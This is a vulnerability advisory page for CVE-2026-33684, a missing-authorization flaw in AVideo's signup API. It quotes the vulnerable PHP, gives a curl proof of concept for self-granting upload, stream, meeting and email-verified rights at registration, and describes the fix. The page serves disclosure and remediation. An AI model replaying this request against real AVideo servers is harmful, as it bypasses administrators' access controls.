Skip to main content

AVideo CVE-2026-33684

MEDIUM
Missing Authorization (CWE-862)
2026-06-22 https://github.com/WWBN/AVideo GHSA-8j8m-p79x-g4jm
5.3
CVSS 3.1 · Vendor: https://github.com/WWBN/AVideo
Share

Severity by source

Vendor (https://github.com/WWBN/AVideo) PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
vuln.today AI
5.3 MEDIUM

Network-accessible endpoint, CAPTCHA solved by attacker (not UI:R), no prior auth required, impact limited to integrity of own account permissions with no confidentiality or availability effect.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/WWBN/AVideo).

CVSS VectorVendor: https://github.com/WWBN/AVideo

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 17:53 vuln.today
Analysis Generated
Jun 22, 2026 - 17:53 vuln.today

DescriptionCVE.org

Summary

The set_api_signUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.

Details

The authentication check in set_api_signUp (plugin/API/API.php:4222) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):

php
// plugin/API/API.php:4222-4232
if ($obj->APISecret !== @$_REQUEST['APISecret']) {
    if(empty($_REQUEST['captcha'])){
        return new ApiObject("Captcha is required");
    }
    require_once $global['systemRootPath'] . 'objects/captcha.php';
    $valid = Captcha::validation($_REQUEST['captcha']);
    if(!$valid){
        return new ApiObject("Captcha is wrong, reload it and try again");
    }
}

After this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:

php
// plugin/API/API.php:4238-4249
if (isset($_REQUEST['emailVerified'])) {
    $global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
    $global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
    $global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
    $global['canUpload'] = intval($_REQUEST['canUpload']);
}

These $global values are then consumed by User::save() (objects/user.php:829-840), which overrides the user object's permission fields:

php
// objects/user.php:829-840
if (isset($global['emailVerified'])) {
    $this->emailVerified = $global['emailVerified'];
}
if (isset($global['canCreateMeet'])) {
    $this->canCreateMeet = $global['canCreateMeet'];
}
if (isset($global['canStream'])) {
    $this->canStream = $global['canStream'];
}
if (isset($global['canUpload'])) {
    $this->canUpload = $global['canUpload'];
}

Note that even though userCreate.json.php:90 sets canUpload from the site's default configuration, User::save() subsequently overrides it with the attacker-controlled $global value.

The codebase already uses self::isAPISecretValid() to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in set_api_signUp.

PoC

bash
# Step 1: Get a CAPTCHA token
# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)
# Step 2: Register with elevated privileges
curl -X POST 'https://target/plugin/API/set.json.php' \
  -d 'APIName=signUp' \
  -d 'user=attacker' \
  -d 'pass=Password123!' \
  -d 'email=attacker@example.com' \
  -d 'name=Attacker' \
  -d 'captcha=VALID_CAPTCHA_TOKEN' \
  -d 'emailVerified=1' \
  -d 'canUpload=1' \
  -d 'canStream=1' \
  -d 'canCreateMeet=1'
# Expected: Account created with default (restricted) permissions
# Actual: Account created with upload, stream, and meet permissions enabled,
#         plus email marked as verified
# Step 3: Verify elevated permissions by logging in and checking profile
curl -X POST 'https://target/plugin/API/set.json.php' \
  -d 'APIName=signIn' \
  -d 'user=attacker' \
  -d 'pass=Password123!'
# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1

Impact

  • Email verification bypass: Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality
  • Unauthorized upload access: Self-granted upload permissions allow uploading potentially malicious video content to the platform
  • Unauthorized streaming access: Self-granted streaming permissions allow unauthorized live streaming
  • Unauthorized meeting creation: Self-granted meet permissions allow creating meetings on the platform
  • Policy bypass: Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented

Recommended Fix

Wrap the privilege parameter handling in an isAPISecretValid() check so that only admin-authenticated requests can set these values:

php
// plugin/API/API.php - replace lines 4238-4249 with:
if (self::isAPISecretValid()) {
    if (isset($_REQUEST['emailVerified'])) {
        $global['emailVerified'] = intval($_REQUEST['emailVerified']);
    }
    if (isset($_REQUEST['canCreateMeet'])) {
        $global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
    }
    if (isset($_REQUEST['canStream'])) {
        $global['canStream'] = intval($_REQUEST['canStream']);
    }
    if (isset($_REQUEST['canUpload'])) {
        $global['canUpload'] = intval($_REQUEST['canUpload']);
    }
}

AnalysisAI

Unauthenticated privilege escalation in AVideo (composer/wwbn/avideo) versions below 29.0 allows any user who can solve a CAPTCHA to self-grant upload, streaming, meeting-creation, and email-verified status during account registration. The root cause is that set_api_signUp in plugin/API/API.php applies admin-controlled permission parameters (emailVerified, canUpload, canStream, canCreateMeet) unconditionally across both its authenticated (APISecret) and anonymous (CAPTCHA) code paths, bypassing the isAPISecretValid() guard that correctly protects equivalent admin operations elsewhere in the codebase. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Access /plugin/API/set.json.php signup endpoint
Delivery
Obtain valid CAPTCHA token from registration page
Exploit
POST registration payload with elevated permission parameters
Execution
API bypasses isAPISecretValid() check for CAPTCHA path
Persist
User::save() applies attacker-controlled globals as account permissions
Impact
Authenticate and exercise unauthorized upload/stream/meet capabilities

Vulnerability AssessmentAI

Exploitation The only prerequisite is access to the AVideo registration API endpoint (`/plugin/API/set.json.php?APIName=signUp` or equivalent POST) and the ability to obtain a valid CAPTCHA token, which can be done by loading the registration page in a browser or using an automated CAPTCHA-solving service. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS 3.1 score of 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) classifies impact as limited integrity modification, which technically captures the metric but understates real-world business risk: the integrity impact is not arbitrary data corruption but a deliberate bypass of administrator-controlled access policies governing who may upload content, stream live video, and create meetings on the platform. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker navigates to the AVideo signup page, solves the CAPTCHA challenge (or uses a CAPTCHA-solving service), then submits a POST request to `/plugin/API/set.json.php` with `APIName=signUp` and appends `emailVerified=1&canUpload=1&canStream=1&canCreateMeet=1` alongside their registration data. The server creates the account, applies the attacker-controlled permission values through the unguarded `User::save()` path, and returns a session confirming the elevated rights. …
Remediation Upgrade to AVideo version 29.0, which resolves the issue by wrapping the privilege-parameter handling block in a `self::isAPISecretValid()` guard so that `emailVerified`, `canUpload`, `canStream`, and `canCreateMeet` can only be set via admin-authenticated API requests. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33684 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy